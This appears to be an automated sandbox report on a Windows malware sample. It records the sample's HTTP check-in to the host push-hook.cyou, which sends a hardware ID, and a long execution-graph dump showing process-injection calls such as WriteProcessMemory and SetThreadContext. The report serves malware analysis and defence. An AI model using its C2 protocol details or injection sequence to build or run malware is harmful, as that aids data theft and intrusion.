                                                                  Set-Cookie: PHPSESSID=qhjnrcd0fvnlpsms5kslilp1c8; expires=Thu, 20-Mar-2025 06:15:23 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6i2GbNQCvzBSOZdPdvN7k9d12WHM11unQ9uCdybdhBX76%2Fvf5LxjXgG56b2s2DH8TJSunjgDpChcgiWLj5qg20YYPUpEX%2Bgk7x6ZCQ%2BmMg5QwLsTaXZ%2F5zzbEIcO0AzLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e79667daa904337-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1588&sent=354&recv=609&lost=0&retrans=0&sent_bytes=2836&recv_bytes=588700&delivery_rate=1802469&cwnd=215&unsent_bytes=0&cid=db8391ef44298990&ts=4741&x=0"


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.449741172.67.161.2074434348C:\Users\user\Desktop\file.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-24 12:28:48 UTC262OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 81
                                                                  Host: push-hook.cyou
                                                                  2024-11-24 12:28:48 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 39 37 44 32 33 31 39 39 37 30 31 33 43 45 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                  Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=97D231997013CEACD7CBBD6DF28D3732
                                                                  2024-11-24 12:28:49 UTC1015INHTTP/1.1 200 OK
                                                                  Date: Sun, 24 Nov 2024 12:28:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=rvmq144lok9iuh6hpguovdbfhm; expires=Thu, 20-Mar-2025 06:15:27 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8gSjHE%2FXepjHLmUqco%2BMhtMBZGk0TgQO5ewiA%2FvdKVU0q3jP%2BUSX4ieo8tgfoNAbMnC1immuDetJGna85SexQzikx79h5AsSW8wo%2BHahJnMNJSUAp5VicUvWZRDmV5Nkog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e7966a3c9111895-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1782&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=979&delivery_rate=1690793&cwnd=185&unsent_bytes=0&cid=2254f615e9d1cc2d&ts=730&x=0"
                                                                  2024-11-24 12:28:49 UTC54INData Raw: 33 30 0d 0a 4e 38 6c 47 6e 38 57 2b 6d 33 4b 63 4f 4e 6f 45 6a 4e 57 47 6d 69 53 37 44 61 38 36 63 64 64 4c 77 44 66 37 4c 6d 46 6b 32 39 56 73 6c 41 3d 3d 0d 0a
                                                                  Data Ascii: 30N8lGn8W+m3KcONoEjNWGmiS7Da86cddLwDf7LmFk29VslA==
                                                                  2024-11-24 12:28:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:07:28:23
                                                                  Start date:24/11/2024
                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                  Imagebase:0xa0000
                                                                  File size:513'536 bytes
                                                                  MD5 hash:7DC51C5014010A56BD8A33D256831A30
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:07:28:23
                                                                  Start date:24/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:07:28:24
                                                                  Start date:24/11/2024
                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                  Imagebase:0xa0000
                                                                  File size:513'536 bytes
                                                                  MD5 hash:7DC51C5014010A56BD8A33D256831A30
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:4.4%
                                                                    Dynamic/Decrypted Code Coverage:0.5%
                                                                    Signature Coverage:4.2%
                                                                    Total number of Nodes:1659
                                                                    Total number of Limit Nodes:23
                                                                    execution_graph 8531 d018d 8535 d01c3 8531->8535 8532 d0310 GetPEB 8533 d0322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 8532->8533 8534 d03c9 WriteProcessMemory 8533->8534 8533->8535 8536 d040e 8534->8536 8535->8532 8535->8533 8537 d0450 WriteProcessMemory Wow64SetThreadContext ResumeThread 8536->8537 8538 d0413 WriteProcessMemory 8536->8538 8538->8536 8539 ba702 8540 ba70e __FrameHandler3::FrameUnwindToState 8539->8540 8565 ba0af 8540->8565 8542 ba715 8543 ba86e 8542->8543 8553 ba73f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 8542->8553 8606 ba464 IsProcessorFeaturePresent 8543->8606 8545 ba875 8546 ba87b 8545->8546 8610 bbef5 8545->8610 8613 bbf0b 8546->8613 8550 ba75e 8551 ba7df 8576 bca76 8551->8576 8553->8550 8553->8551 8589 bbf3f 8553->8589 8555 ba7e5 8580 ade10 8555->8580 8560 ba80a 8561 ba813 8560->8561 8597 bbf21 8560->8597 8600 ba0e8 8561->8600 8566 ba0b8 8565->8566 8616 ba220 IsProcessorFeaturePresent 8566->8616 8570 ba0c9 8571 ba0cd 8570->8571 8626 bba80 8570->8626 8571->8542 8574 ba0e4 8574->8542 8577 bca84 8576->8577 8578 bca7f 8576->8578 8577->8555 8698 bcb9f 8578->8698 9567 adeb0 8580->9567 8587 b9261 CatchGuardHandler 5 API calls 8588 adea4 8587->8588 8595 ba40c GetModuleHandleW 8588->8595 8590 bbf55 __FrameHandler3::FrameUnwindToState __dosmaperr 8589->8590 8590->8551 8591 bf02a _unexpected 48 API calls 8590->8591 8594 bd49c 8591->8594 8592 bd37d CallUnexpected 48 API calls 8593 bd4c6 8592->8593 8594->8592 8596 ba418 8595->8596 8596->8545 8596->8560 9968 bc040 8597->9968 8601 ba0f4 8600->8601 8602 ba10a 8601->8602 10041 bba92 8601->10041 8602->8550 8604 ba102 8605 bb0ea ___scrt_uninitialize_crt 7 API calls 8604->8605 8605->8602 8607 ba47a CallUnexpected std::bad_exception::bad_exception 8606->8607 8608 ba525 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8607->8608 8609 ba570 CallUnexpected 8608->8609 8609->8545 8611 bc040 CallUnexpected 21 API calls 8610->8611 8612 bbf06 8611->8612 8612->8546 8614 bc040 CallUnexpected 21 API calls 8613->8614 8615 ba883 8614->8615 8617 ba0c4 8616->8617 8618 bb0cb 8617->8618 8635 be726 8618->8635 8622 bb0dc 8623 bb0e7 8622->8623 8649 be762 8622->8649 8623->8570 8625 bb0d4 8625->8570 8689 c0125 8626->8689 8629 bb0ea 8630 bb0fd 8629->8630 8631 bb0f3 8629->8631 8630->8571 8632 bd831 ___vcrt_uninitialize_ptd 6 API calls 8631->8632 8633 bb0f8 8632->8633 8634 be762 ___vcrt_uninitialize_locks DeleteCriticalSection 8633->8634 8634->8630 8637 be72f 8635->8637 8638 be758 8637->8638 8639 bb0d0 8637->8639 8653 c2c37 8637->8653 8640 be762 ___vcrt_uninitialize_locks DeleteCriticalSection 8638->8640 8639->8625 8641 bd7fe 8639->8641 8640->8639 8670 c2b48 8641->8670 8644 bd813 8644->8622 8647 bd82e 8647->8622 8650 be78c 8649->8650 8651 be76d 8649->8651 8650->8625 8652 be777 DeleteCriticalSection 8651->8652 8652->8650 8652->8652 8658 c2cc9 8653->8658 8656 c2c6f InitializeCriticalSectionAndSpinCount 8657 c2c5a 8656->8657 8657->8637 8659 c2cea 8658->8659 8660 c2c51 8658->8660 8659->8660 8661 c2d52 GetProcAddress 8659->8661 8663 c2d43 8659->8663 8665 c2c7e LoadLibraryExW 8659->8665 8660->8656 8660->8657 8661->8660 8663->8661 8664 c2d4b FreeLibrary 8663->8664 8664->8661 8666 c2c95 GetLastError 8665->8666 8667 c2cc5 8665->8667 8666->8667 8668 c2ca0 ___vcrt_FlsFree 8666->8668 8667->8659 8668->8667 8669 c2cb6 LoadLibraryExW 8668->8669 8669->8659 8671 c2cc9 ___vcrt_FlsFree 5 API calls 8670->8671 8672 c2b62 8671->8672 8673 c2b7b TlsAlloc 8672->8673 8674 bd808 8672->8674 8674->8644 8675 c2bf9 8674->8675 8676 c2cc9 ___vcrt_FlsFree 5 API calls 8675->8676 8677 c2c13 8676->8677 8678 c2c2e TlsSetValue 8677->8678 8679 bd821 8677->8679 8678->8679 8679->8647 8680 bd831 8679->8680 8681 bd83b 8680->8681 8682 bd841 8680->8682 8684 c2b83 8681->8684 8682->8644 8685 c2cc9 ___vcrt_FlsFree 5 API calls 8684->8685 8686 c2b9d 8685->8686 8687 c2bb5 TlsFree 8686->8687 8688 c2ba9 8686->8688 8687->8688 8688->8682 8690 c0135 8689->8690 8691 ba0d6 8689->8691 8690->8691 8693 bf752 8690->8693 8691->8574 8691->8629 8694 bf759 8693->8694 8695 bf79c GetStdHandle 8694->8695 8696 bf7fe 8694->8696 8697 bf7af GetFileType 8694->8697 8695->8694 8696->8690 8697->8694 8699 bcbbe 8698->8699 8700 bcba8 8698->8700 8699->8577 8700->8699 8704 bcae0 8700->8704 8702 bcbb5 8702->8699 8721 bccad 8702->8721 8705 bcae9 8704->8705 8706 bcaec 8704->8706 8705->8702 8730 bf8a0 8706->8730 8711 bcb09 8763 bcbcb 8711->8763 8712 bcafd 8757 c00eb 8712->8757 8717 c00eb ___free_lconv_mon 14 API calls 8718 bcb2d 8717->8718 8719 c00eb ___free_lconv_mon 14 API calls 8718->8719 8720 bcb33 8719->8720 8720->8702 8722 bcd1e 8721->8722 8725 bccbc 8721->8725 8722->8699 8723 c2151 WideCharToMultiByte ___scrt_uninitialize_crt 8723->8725 8724 c0827 __dosmaperr 14 API calls 8724->8725 8725->8722 8725->8723 8725->8724 8727 bcd22 8725->8727 8729 c00eb ___free_lconv_mon 14 API calls 8725->8729 9352 c2324 8725->9352 8726 c00eb ___free_lconv_mon 14 API calls 8726->8722 8727->8726 8729->8725 8731 bf8a9 8730->8731 8732 bcaf2 8730->8732 8785 bf0e5 8731->8785 8736 c224d GetEnvironmentStringsW 8732->8736 8737 c2265 8736->8737 8750 bcaf7 8736->8750 8738 c2151 ___scrt_uninitialize_crt WideCharToMultiByte 8737->8738 8739 c2282 8738->8739 8740 c228c FreeEnvironmentStringsW 8739->8740 8741 c2297 8739->8741 8740->8750 8742 c0c65 15 API calls 8741->8742 8743 c229e 8742->8743 8744 c22a6 8743->8744 8745 c22b7 8743->8745 8746 c00eb ___free_lconv_mon 14 API calls 8744->8746 8747 c2151 ___scrt_uninitialize_crt WideCharToMultiByte 8745->8747 8748 c22ab FreeEnvironmentStringsW 8746->8748 8749 c22c7 8747->8749 8748->8750 8751 c22ce 8749->8751 8752 c22d6 8749->8752 8750->8711 8750->8712 8753 c00eb ___free_lconv_mon 14 API calls 8751->8753 8754 c00eb ___free_lconv_mon 14 API calls 8752->8754 8755 c22d4 FreeEnvironmentStringsW 8753->8755 8754->8755 8755->8750 8758 c00f6 RtlFreeHeap 8757->8758 8762 bcb03 8757->8762 8759 c010b GetLastError 8758->8759 8758->8762 8760 c0118 __dosmaperr 8759->8760 8761 c0777 __strnicoll 12 API calls 8760->8761 8761->8762 8762->8702 8764 bcbe0 8763->8764 8765 c0827 __dosmaperr 14 API calls 8764->8765 8766 bcc07 8765->8766 8767 bcc0f 8766->8767 8773 bcc19 8766->8773 8768 c00eb ___free_lconv_mon 14 API calls 8767->8768 8769 bcb10 8768->8769 8769->8717 8770 bcc76 8771 c00eb ___free_lconv_mon 14 API calls 8770->8771 8771->8769 8772 c0827 __dosmaperr 14 API calls 8772->8773 8773->8770 8773->8772 8774 bcc85 8773->8774 8779 bcca0 8773->8779 8782 c00eb ___free_lconv_mon 14 API calls 8773->8782 9333 be6cc 8773->9333 9342 bcb70 8774->9342 8778 c00eb ___free_lconv_mon 14 API calls 8781 bcc92 8778->8781 9348 bcdb6 IsProcessorFeaturePresent 8779->9348 8784 c00eb ___free_lconv_mon 14 API calls 8781->8784 8782->8773 8783 bccac 8784->8769 8786 bf0f6 8785->8786 8787 bf0f0 8785->8787 8807 bf0fc 8786->8807 8837 bebef 8786->8837 8832 bebb0 8787->8832 8795 bf128 8797 bebef __dosmaperr 6 API calls 8795->8797 8796 bf13d 8798 bebef __dosmaperr 6 API calls 8796->8798 8805 bf134 8797->8805 8799 bf149 8798->8799 8800 bf14d 8799->8800 8801 bf15c 8799->8801 8802 bebef __dosmaperr 6 API calls 8800->8802 8851 bf33c 8801->8851 8802->8805 8804 c00eb ___free_lconv_mon 14 API calls 8804->8807 8805->8804 8809 bf101 8807->8809 8856 bd37d 8807->8856 8808 c00eb ___free_lconv_mon 14 API calls 8808->8809 8810 bfce3 8809->8810 8811 bfd0d 8810->8811 9157 bfb6f 8811->9157 8816 bfd3f 8818 c00eb ___free_lconv_mon 14 API calls 8816->8818 8817 bfd4d 9171 bf96a 8817->9171 8820 bfd26 8818->8820 8820->8732 8822 bfd85 8823 c0777 __strnicoll 14 API calls 8822->8823 8824 bfd8a 8823->8824 8826 c00eb ___free_lconv_mon 14 API calls 8824->8826 8825 bfdcc 8828 bfe15 8825->8828 9182 c009e 8825->9182 8826->8820 8827 bfda0 8827->8825 8830 c00eb ___free_lconv_mon 14 API calls 8827->8830 8829 c00eb ___free_lconv_mon 14 API calls 8828->8829 8829->8820 8830->8825 8865 beebe 8832->8865 8835 bebe7 TlsGetValue 8836 bebd5 8836->8786 8838 beebe __dosmaperr 5 API calls 8837->8838 8839 bec0b 8838->8839 8840 bec29 TlsSetValue 8839->8840 8841 bec14 8839->8841 8841->8807 8842 c0827 8841->8842 8843 c0834 8842->8843 8844 c0874 8843->8844 8845 c085f HeapAlloc 8843->8845 8849 c0848 __dosmaperr 8843->8849 8883 c0777 8844->8883 8847 c0872 8845->8847 8845->8849 8848 bf120 8847->8848 8848->8795 8848->8796 8849->8844 8849->8845 8880 bc227 8849->8880 8920 bf4a2 8851->8920 9022 c01dc 8856->9022 8859 bd397 IsProcessorFeaturePresent 8863 bd382 8859->8863 8860 bbf0b CallUnexpected 21 API calls 8860->8863 8863->8856 8863->8859 8863->8860 8864 bd859 8863->8864 9025 c0203 8863->9025 9052 bcdea 8863->9052 9058 bd85a 8863->9058 8866 bebcc 8865->8866 8867 beeee 8865->8867 8866->8835 8866->8836 8867->8866 8872 bedf3 8867->8872 8870 bef08 GetProcAddress 8870->8866 8871 bef18 __dosmaperr 8870->8871 8871->8866 8873 bee04 ___vcrt_FlsFree 8872->8873 8874 bee9a 8873->8874 8875 bee22 LoadLibraryExW 8873->8875 8879 bee70 LoadLibraryExW 8873->8879 8874->8866 8874->8870 8876 bee3d GetLastError 8875->8876 8877 beea1 8875->8877 8876->8873 8877->8874 8878 beeb3 FreeLibrary 8877->8878 8878->8874 8879->8873 8879->8877 8886 bc262 8880->8886 8897 bf17b GetLastError 8883->8897 8885 c077c 8885->8848 8887 bc26e __FrameHandler3::FrameUnwindToState 8886->8887 8892 bd181 EnterCriticalSection 8887->8892 8889 bc279 CallUnexpected 8893 bc2b0 8889->8893 8892->8889 8896 bd198 LeaveCriticalSection 8893->8896 8895 bc232 8895->8849 8896->8895 8898 bf197 8897->8898 8899 bf191 8897->8899 8900 bebef __dosmaperr 6 API calls 8898->8900 8903 bf19b SetLastError 8898->8903 8901 bebb0 __dosmaperr 6 API calls 8899->8901 8902 bf1b3 8900->8902 8901->8898 8902->8903 8905 c0827 __dosmaperr 12 API calls 8902->8905 8903->8885 8906 bf1c8 8905->8906 8907 bf1e1 8906->8907 8908 bf1d0 8906->8908 8910 bebef __dosmaperr 6 API calls 8907->8910 8909 bebef __dosmaperr 6 API calls 8908->8909 8917 bf1de 8909->8917 8911 bf1ed 8910->8911 8912 bf208 8911->8912 8913 bf1f1 8911->8913 8915 bf33c __dosmaperr 12 API calls 8912->8915 8916 bebef __dosmaperr 6 API calls 8913->8916 8914 c00eb ___free_lconv_mon 12 API calls 8914->8903 8918 bf213 8915->8918 8916->8917 8917->8914 8919 c00eb ___free_lconv_mon 12 API calls 8918->8919 8919->8903 8921 bf4ae __FrameHandler3::FrameUnwindToState 8920->8921 8934 bd181 EnterCriticalSection 8921->8934 8923 bf4b8 8935 bf4e8 8923->8935 8926 bf4f4 8927 bf500 __FrameHandler3::FrameUnwindToState 8926->8927 8939 bd181 EnterCriticalSection 8927->8939 8929 bf50a 8940 bf2f1 8929->8940 8931 bf522 8944 bf542 8931->8944 8934->8923 8938 bd198 LeaveCriticalSection 8935->8938 8937 bf3aa 8937->8926 8938->8937 8939->8929 8941 bf327 __dosmaperr 8940->8941 8942 bf300 __dosmaperr 8940->8942 8941->8931 8942->8941 8947 c0fce 8942->8947 9021 bd198 LeaveCriticalSection 8944->9021 8946 bf167 8946->8808 8948 c104e 8947->8948 8951 c0fe4 8947->8951 8949 c109c 8948->8949 8952 c00eb ___free_lconv_mon 14 API calls 8948->8952 9015 c1168 8949->9015 8951->8948 8953 c1017 8951->8953 8959 c00eb ___free_lconv_mon 14 API calls 8951->8959 8954 c1070 8952->8954 8955 c1039 8953->8955 8961 c00eb ___free_lconv_mon 14 API calls 8953->8961 8956 c00eb ___free_lconv_mon 14 API calls 8954->8956 8958 c00eb ___free_lconv_mon 14 API calls 8955->8958 8960 c1083 8956->8960 8957 c10aa 8964 c110a 8957->8964 8971 c00eb 14 API calls ___free_lconv_mon 8957->8971 8963 c1043 8958->8963 8965 c100c 8959->8965 8962 c00eb ___free_lconv_mon 14 API calls 8960->8962 8966 c102e 8961->8966 8967 c1091 8962->8967 8968 c00eb ___free_lconv_mon 14 API calls 8963->8968 8969 c00eb ___free_lconv_mon 14 API calls 8964->8969 8975 c09f5 8965->8975 9003 c0af3 8966->9003 8973 c00eb ___free_lconv_mon 14 API calls 8967->8973 8968->8948 8974 c1110 8969->8974 8971->8957 8973->8949 8974->8941 8976 c0a06 8975->8976 8977 c0aef 8975->8977 8978 c0a17 8976->8978 8979 c00eb ___free_lconv_mon 14 API calls 8976->8979 8977->8953 8980 c0a29 8978->8980 8982 c00eb ___free_lconv_mon 14 API calls 8978->8982 8979->8978 8981 c0a3b 8980->8981 8983 c00eb ___free_lconv_mon 14 API calls 8980->8983 8984 c0a4d 8981->8984 8985 c00eb ___free_lconv_mon 14 API calls 8981->8985 8982->8980 8983->8981 8986 c0a5f 8984->8986 8987 c00eb ___free_lconv_mon 14 API calls 8984->8987 8985->8984 8988 c0a71 8986->8988 8990 c00eb ___free_lconv_mon 14 API calls 8986->8990 8987->8986 8989 c0a83 8988->8989 8991 c00eb ___free_lconv_mon 14 API calls 8988->8991 8992 c0a95 8989->8992 8993 c00eb ___free_lconv_mon 14 API calls 8989->8993 8990->8988 8991->8989 8994 c0aa7 8992->8994 8995 c00eb ___free_lconv_mon 14 API calls 8992->8995 8993->8992 8996 c0ab9 8994->8996 8998 c00eb ___free_lconv_mon 14 API calls 8994->8998 8995->8994 8997 c0acb 8996->8997 8999 c00eb ___free_lconv_mon 14 API calls 8996->8999 9000 c0add 8997->9000 9001 c00eb ___free_lconv_mon 14 API calls 8997->9001 8998->8996 8999->8997 9000->8977 9002 c00eb ___free_lconv_mon 14 API calls 9000->9002 9001->9000 9002->8977 9004 c0b00 9003->9004 9014 c0b58 9003->9014 9005 c0b10 9004->9005 9006 c00eb ___free_lconv_mon 14 API calls 9004->9006 9007 c0b22 9005->9007 9008 c00eb ___free_lconv_mon 14 API calls 9005->9008 9006->9005 9009 c0b34 9007->9009 9010 c00eb ___free_lconv_mon 14 API calls 9007->9010 9008->9007 9011 c00eb ___free_lconv_mon 14 API calls 9009->9011 9012 c0b46 9009->9012 9010->9009 9011->9012 9013 c00eb ___free_lconv_mon 14 API calls 9012->9013 9012->9014 9013->9014 9014->8955 9016 c1175 9015->9016 9020 c1194 9015->9020 9017 c0b5c __dosmaperr 14 API calls 9016->9017 9016->9020 9018 c118e 9017->9018 9019 c00eb ___free_lconv_mon 14 API calls 9018->9019 9019->9020 9020->8957 9021->8946 9072 c045f 9022->9072 9026 c020f __FrameHandler3::FrameUnwindToState 9025->9026 9027 bf17b __dosmaperr 14 API calls 9026->9027 9028 c025f 9026->9028 9029 c0271 CallUnexpected 9026->9029 9034 c0240 CallUnexpected 9026->9034 9027->9034 9030 c0777 __strnicoll 14 API calls 9028->9030 9031 c02a7 CallUnexpected 9029->9031 9086 bd181 EnterCriticalSection 9029->9086 9032 c0264 9030->9032 9037 c02e4 9031->9037 9038 c03e1 9031->9038 9048 c0312 9031->9048 9083 bcd89 9032->9083 9034->9028 9034->9029 9051 c0249 9034->9051 9037->9048 9087 bf02a GetLastError 9037->9087 9039 c03ec 9038->9039 9118 bd198 LeaveCriticalSection 9038->9118 9042 bbf0b CallUnexpected 21 API calls 9039->9042 9044 c03f4 9042->9044 9046 bf02a _unexpected 48 API calls 9049 c0367 9046->9049 9047 bf02a _unexpected 48 API calls 9047->9048 9114 c038d 9048->9114 9050 bf02a _unexpected 48 API calls 9049->9050 9049->9051 9050->9051 9051->8863 9053 bce06 CallUnexpected std::bad_exception::bad_exception 9052->9053 9054 bce32 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9053->9054 9055 bcf03 CallUnexpected 9054->9055 9141 b9261 9055->9141 9057 bcf21 9057->8863 9059 bd863 9058->9059 9060 bd866 GetLastError 9058->9060 9059->8863 9149 c2bbe 9060->9149 9063 bd89a 9064 bd8e0 SetLastError 9063->9064 9064->8863 9065 c2bf9 ___vcrt_FlsSetValue 6 API calls 9066 bd894 _unexpected 9065->9066 9066->9063 9067 bd8bc 9066->9067 9068 c2bf9 ___vcrt_FlsSetValue 6 API calls 9066->9068 9069 c2bf9 ___vcrt_FlsSetValue 6 API calls 9067->9069 9070 bd8d0 9067->9070 9068->9067 9069->9070 9154 bd3cc 9070->9154 9073 c046b __FrameHandler3::FrameUnwindToState 9072->9073 9078 bd181 EnterCriticalSection 9073->9078 9075 c0479 9079 c04bb 9075->9079 9078->9075 9082 bd198 LeaveCriticalSection 9079->9082 9081 c0201 9081->8863 9082->9081 9119 bd0bf 9083->9119 9086->9031 9088 bf046 9087->9088 9089 bf040 9087->9089 9091 bebef __dosmaperr 6 API calls 9088->9091 9093 bf04a SetLastError 9088->9093 9090 bebb0 __dosmaperr 6 API calls 9089->9090 9090->9088 9092 bf062 9091->9092 9092->9093 9095 c0827 __dosmaperr 14 API calls 9092->9095 9096 bf0da 9093->9096 9097 bf0df 9093->9097 9098 bf077 9095->9098 9096->9047 9101 bd37d CallUnexpected 46 API calls 9097->9101 9099 bf07f 9098->9099 9100 bf090 9098->9100 9102 bebef __dosmaperr 6 API calls 9099->9102 9103 bebef __dosmaperr 6 API calls 9100->9103 9104 bf0e4 9101->9104 9105 bf08d 9102->9105 9106 bf09c 9103->9106 9110 c00eb ___free_lconv_mon 14 API calls 9105->9110 9107 bf0a0 9106->9107 9108 bf0b7 9106->9108 9109 bebef __dosmaperr 6 API calls 9107->9109 9111 bf33c __dosmaperr 14 API calls 9108->9111 9109->9105 9110->9093 9112 bf0c2 9111->9112 9113 c00eb ___free_lconv_mon 14 API calls 9112->9113 9113->9093 9115 c0359 9114->9115 9116 c0391 9114->9116 9115->9046 9115->9049 9115->9051 9140 bd198 LeaveCriticalSection 9116->9140 9118->9039 9120 bd0d1 __strnicoll 9119->9120 9125 bcf32 9120->9125 9126 bcf49 9125->9126 9127 bcf42 9125->9127 9129 bd096 __strnicoll GetLastError SetLastError 9126->9129 9133 bcf57 9126->9133 9128 bd050 __strnicoll 16 API calls 9127->9128 9128->9126 9130 bcf7e 9129->9130 9131 bcdb6 __strnicoll 11 API calls 9130->9131 9130->9133 9132 bcfae 9131->9132 9134 bcff7 9133->9134 9135 bd003 9134->9135 9136 bd01a 9135->9136 9138 bd033 __strnicoll 48 API calls 9135->9138 9137 bcd95 9136->9137 9139 bd033 __strnicoll 48 API calls 9136->9139 9137->9051 9138->9136 9139->9137 9140->9115 9142 b926a IsProcessorFeaturePresent 9141->9142 9143 b9269 9141->9143 9145 b9a14 9142->9145 9143->9057 9148 b9af9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9145->9148 9147 b9af7 9147->9057 9148->9147 9150 c2cc9 ___vcrt_FlsFree 5 API calls 9149->9150 9151 c2bd8 9150->9151 9152 c2bf0 TlsGetValue 9151->9152 9153 bd87b 9151->9153 9152->9153 9153->9063 9153->9064 9153->9065 9155 c00eb ___free_lconv_mon 14 API calls 9154->9155 9156 bd3e4 9155->9156 9156->9063 9190 bf8e8 9157->9190 9160 bfba2 9162 bfbb9 9160->9162 9163 bfba7 GetACP 9160->9163 9161 bfb90 GetOEMCP 9161->9162 9162->8820 9164 c0c65 9162->9164 9163->9162 9165 c0ca3 9164->9165 9169 c0c73 __dosmaperr 9164->9169 9166 c0777 __strnicoll 14 API calls 9165->9166 9168 bfd37 9166->9168 9167 c0c8e RtlAllocateHeap 9167->9168 9167->9169 9168->8816 9168->8817 9169->9165 9169->9167 9170 bc227 __dosmaperr 2 API calls 9169->9170 9170->9169 9172 bfb6f 50 API calls 9171->9172 9173 bf98a 9172->9173 9175 bf9c7 IsValidCodePage 9173->9175 9180 bfa8f 9173->9180 9181 bf9e2 std::bad_exception::bad_exception 9173->9181 9174 b9261 CatchGuardHandler 5 API calls 9176 bfb6d 9174->9176 9177 bf9d9 9175->9177 9175->9180 9176->8822 9176->8827 9178 bfa02 GetCPInfo 9177->9178 9177->9181 9178->9180 9178->9181 9180->9174 9230 bfef9 9181->9230 9183 c00aa __FrameHandler3::FrameUnwindToState 9182->9183 9307 bd181 EnterCriticalSection 9183->9307 9185 c00b4 9308 bfe38 9185->9308 9191 bf8ff 9190->9191 9192 bf906 9190->9192 9191->9160 9191->9161 9192->9191 9193 bf02a _unexpected 48 API calls 9192->9193 9194 bf927 9193->9194 9198 c297d 9194->9198 9199 bf93d 9198->9199 9200 c2990 9198->9200 9202 c29aa 9199->9202 9200->9199 9206 c1199 9200->9206 9203 c29bd 9202->9203 9204 c29d2 9202->9204 9203->9204 9227 bf883 9203->9227 9204->9191 9207 c11a5 __FrameHandler3::FrameUnwindToState 9206->9207 9208 bf02a _unexpected 48 API calls 9207->9208 9209 c11ae 9208->9209 9216 c11f4 9209->9216 9219 bd181 EnterCriticalSection 9209->9219 9211 c11cc 9220 c121a 9211->9220 9216->9199 9217 bd37d CallUnexpected 48 API calls 9218 c1219 9217->9218 9219->9211 9221 c1228 __dosmaperr 9220->9221 9223 c11dd 9220->9223 9222 c0fce __dosmaperr 14 API calls 9221->9222 9221->9223 9222->9223 9224 c11f9 9223->9224 9225 bd198 CallUnexpected LeaveCriticalSection 9224->9225 9226 c11f0 9225->9226 9226->9216 9226->9217 9228 bf02a _unexpected 48 API calls 9227->9228 9229 bf888 9228->9229 9229->9204 9231 bff21 GetCPInfo 9230->9231 9240 bffea 9230->9240 9237 bff39 9231->9237 9231->9240 9233 b9261 CatchGuardHandler 5 API calls 9235 c009c 9233->9235 9235->9180 9241 c0d0d 9237->9241 9239 c2ef4 52 API calls 9239->9240 9240->9233 9242 bf8e8 __strnicoll 48 API calls 9241->9242 9243 c0d2d 9242->9243 9261 c0e0e 9243->9261 9245 c0d5a 9246 c0de1 9245->9246 9247 c0de9 9245->9247 9250 c0c65 15 API calls 9245->9250 9252 